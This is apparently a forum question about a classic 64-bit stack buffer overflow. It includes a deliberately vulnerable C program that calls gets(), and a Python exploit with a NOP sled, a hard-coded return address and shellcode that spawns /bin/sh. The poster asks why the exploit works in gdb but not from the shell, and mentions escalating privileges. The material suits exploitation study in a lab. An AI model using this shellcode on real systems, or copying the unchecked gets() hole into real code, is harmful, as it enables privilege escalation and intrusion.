I'm facing a problem while trying to inject shellcode into a program through a buffer overflow on 64-bit. I already disabled ASLR and compiled without stack cookies and with execstack.
```c
// vuln.c
#include <stdio.h>

void vuln()
{
    printf("Give me something to worry about...\n");
    char buf[500];
    gets(buf);
    printf("No root shell for you...\n");
}

int main()
{
    vuln();
}
```
```python
# exp.py
from struct import pack

payload_len = 520
nop = "\x90"*300
# Address in the middle of the NOP sled
rip = 0x7fffffffdf4c

buf = ""
buf += "\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05"
buf += "\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05"
buf += "\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05"

buf_len = len(buf)
nop_len = len(nop)
padding = "A"*(payload_len-nop_len-buf_len)
payload = nop + buf + padding + pack("<Q", rip)
print payload
```
Basically the exploit only works while running in gdb (I'm able to start a shell) but not on the command line. I figured it could be because of a closed pipe, so I tried the cat trick by doing `(python exp.py; cat) | ./vuln`, but it didn't help. Obviously doing the exploit in gdb doesn't allow me to escalate privileges. Does someone know what I'm doing wrong?
Thanks in advance.